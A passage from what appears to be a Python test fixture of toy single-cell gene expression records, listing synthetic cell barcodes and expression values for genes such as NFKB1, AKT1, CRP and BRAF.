"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ABCB1 Expression": {
"name": "ABCB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
1.0,
2.0,
2.0,
2.81,
2.0,
2.58,
2.81,
1.0,
3.0,
2.0,
2.81,
2.32,
2.58,
1.0,
2.58,
1.0,
2.58,
2.81,
1.58,
2.32,
2.32,
1.58,
2.58,
1.58,
1.0,
3.0,
3.0,
3.0,
2.32,
2.81,
1.0,
1.58,
2.58,
2.32,
2.32,
2.0,
2.81,
3.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LOC110806262 Cells": {
"name": "LOC110806262 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LOC110806262 Expression": {
"name": "LOC110806262 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
1.58,
2.81,
2.0,
2.58,
2.58,
1.0,
2.58,
2.0,
1.58,
3.0,
2.58,
2.32,
2.32,
1.58,
1.58,
1.0,
2.81,
3.0,
2.81,
2.81,
3.0,
3.0,
2.0,
1.58,
1.58,
2.32,
2.32,
2.32,
2.81,
2.32,
2.81,
2.58,
2.32,
2.0,
1.58,
1.0,
1.0,
2.58,
2.32,
2.58,
2.58,
1.58,
3.0,
2.0,
3.0,
2.81,
1.58,
2.0,
2.81,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NFKB1 Cells": {
"name": "NFKB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NFKB1 Expression": {
"name": "NFKB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.58,
2.32,
1.0,
1.0,
2.0,
2.0,
2.32,
2.58,
2.58,
1.58,
1.0,
1.58,
2.32,
2.0,
1.58,
2.32,
2.0,
2.0,
2.81,
2.32,
2.0,
2.81,
2.58,
1.0,
2.32,
1.0,
2.58,
2.32,
1.58,
3.0,
2.81,
2.81,
1.0,
2.0,
2.58,
2.81,
1.0,
2.32,
2.58,
2.81,
2.0,
1.0,
3.0,
1.0,
2.0,
2.0,
2.32,
2.81,
2.58,
2.58,
1.58,
2.32,
2.81,
2.32,
2.0,
1.0,
3.0,
2.58,
1.0,
2.81,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AKT1 Cells": {
"name": "AKT1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AKT1 Expression": {
"name": "AKT1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.58,
2.0,
2.0,
3.0,
2.58,
3.0,
1.0,
2.81,
1.58,
2.0,
3.0,
3.0,
2.0,
1.0,
1.58,
2.81,
2.0,
1.0,
2.0,
2.0,
2.81,
1.58,
2.58,
2.32,
2.0,
2.0,
2.32,
1.58,
1.58,
1.58,
1.0,
2.32,
3.0,
1.0,
3.0,
1.0,
2.58,
1.58,
2.32,
2.0,
2.81,
3.0,
3.0,
2.0,
2.0,
1.0,
1.0,
2.58,
2.32,
2.81,
2.58,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CRP Cells": {
"name": "CRP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CRP Expression": {
"name": "CRP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
1.58,
2.81,
2.0,
2.0,
2.81,
2.32,
2.0,
1.0,
1.58,
2.58,
1.58,
2.58,
2.32,
2.81,
3.0,
2.32,
1.58,
2.58,
1.0,
2.58,
1.58,
2.81,
2.81,
2.32,
2.0,
2.0,
1.58,
2.0,
1.58,
2.58,
2.32,
2.81,
1.58,
2.32,
1.0,
1.0,
2.32,
2.32,
3.0,
2.0,
2.0,
2.32,
3.0,
1.58,
3.0,
2.32,
1.0,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AR Cells": {
"name": "AR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AR Expression": {
"name": "AR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.0,
2.0,
3.0,
2.81,
1.0,
2.58,
2.81,
1.58,
2.58,
1.0,
2.32,
1.58,
1.58,
1.58,
2.81,
2.32,
2.58,
1.58,
2.58,
3.0,
1.0,
2.58,
2.32,
2.58,
3.0,
2.58,
2.0,
3.0,
3.0,
2.58,
2.81,
2.81,
2.81,
2.58,
1.0,
1.58,
1.0,
3.0,
2.32,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BDNF Cells": {
"name": "BDNF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BDNF Expression": {
"name": "BDNF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
2.32,
1.0,
1.58,
3.0,
1.0,
2.0,
3.0,
2.0,
2.58,
3.0,
3.0,
1.0,
1.0,
1.0,
2.0,
1.0,
3.0,
2.32,
2.0,
1.58,
2.81,
2.58,
1.58,
2.32,
1.0,
2.81,
3.0,
2.58,
2.0,
2.58,
2.0,
2.58,
2.32,
2.32,
2.32,
2.81,
2.32,
2.58,
1.58,
2.81,
3.0,
3.0,
1.0,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRAF Cells": {
"name": "BRAF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
